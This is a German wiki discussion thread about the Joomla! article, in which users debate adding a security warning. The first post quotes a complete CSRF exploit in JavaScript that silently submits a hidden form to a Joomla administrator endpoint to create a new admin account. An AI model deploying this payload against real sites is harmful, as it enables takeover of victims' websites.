staging.inyokaproject.org

Vielleicht sollte man in den Artikel noch reinschreiben, dass Joomla absoluter Schrott ist? Und das ganz objektiv gesehen. Es vergeht keine Woche in der auf FD keine Lücke dazu gepostet wird. Erst vor zwei Tagen kam ne CRSF rein die einzusätzliches Admin-Konto erstellt:

If a logged in administrator visits this page a new administrator will be added to the victim's
Joomla powered website.

---- exploit code ----

<script type="text/javascript">

window.onload = function() {

    var url = "http://joomlasite.com/joomla/administrator/index2.php";


    var gid = 25;

    var user = 'custom_username';

    var pass = 'custom_password';

    var email = 'joe_cool@example.com';

    var param = {

        name: user,

        username: user,

        email: email,

        password: pass,

        password2: pass,

        gid: gid,

        block: 0,

        option: 'com_users',

        task: 'save',

        sendEmail: 1

    };


    var form = document.createElement('form');

    form.action = url;

    form.method = 'post';

    form.target = 'hidden';

    form.style.display = 'none';


    for (var i in param) {

        try {

            // ie

            var input = document.createElement('<input name="'+i+'">');

        } catch(e) {

            // other browsers

            var input = document.createElement('input');

            input.name = i;

        }

        input.setAttribute('value',  param[i]);

        form.appendChild(input);

    }

    document.body.appendChild(form);


    form.submit();

}

</script>


<iframe name="hidden" style="display: none"></iframe>


<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">

---- exploit code ----

Auch milw0rm zählt unzählige exploits dafür... Joomla ist kacke und sollte imo von niemandem benutzt werden. Vielleicht eine Hinweis-Box, dass sich Joomla in der Vergangenheit sehr anfällig für Sicherheitslücken erwiesen hat?

Hallo,

Vielleicht sollte man in den Artikel noch reinschreiben, dass Joomla absoluter Schrott ist? Und das ganz objektiv gesehen.

Man sollte es wenn diplomatischer ausdrücken... 😉

Man kann auch reinschreiben, dass Joomla! das OpenSource Projekt ist, was nach dem Fork in Sachen Release Politik so ziemlich alles falsch gemacht hat, was man falsch machen kann, AFAIK 😈

Im Ernst - so ein Satz wie:

"Nach der Installation von Joomla! sollte wert darauf gelegt werden, die Installation abzusichern, da für Joomla! in der Vergangheit einige Sicherheitslücken bekannt geworden sind" und ein paar Links dazu.

Gruß
noisefloor

Ich hatte mich mit Kommentaren zurückgehalten 😀 milw0rm listet ja wirklich viel zu Joomla auf. Ich würde diesen Link gerne in einer Warnungsbox bringen. Nur, hmmm, können/dürfen wir "milw0rm - exploits : vulnerabilities : videos : papers : shellcode" verlinken?

Hallo,

wie sieht's aus?

Ich halte die Ideen für gut.

@Chrisssss: Was meinst du mit "können wir verlinken"? Ein Link auf eine externe Seite ist doch nicht schlimm...

Gruß
noisefloor

noisefloor hat geschrieben:

@Chrisssss: Was meinst du mit "können wir verlinken"? Ein Link auf eine externe Seite ist doch nicht schlimm...

Böser Hackerparagraph? Eine Webpage, die Exploits sammelt?

Hallo,

ach so... hm.

Vorschlag, ein Satz a la

"In der Vergangenheit ist Joomla! leider durch verschiedene Sicherheitslücken aufgefallen, die entsprechenden Meldung kann man in den einschlägigen Forum und Listen nachlesen."

Gruß
noisefloor

Hallo,

verschoben: Joomla!

Gruß
noisefloor

Hallo!

Ich konnte die Anleitung komplett zu Joomla 3 nachvollziehen und habe die Vorlage Ausbaufähig deshalb entfernt.

Sehr schoen, danke ☺

Ungetestet, wenn jemand testen will, bitte dies tun oder wegen Baustelle melden. Sonst Archiv.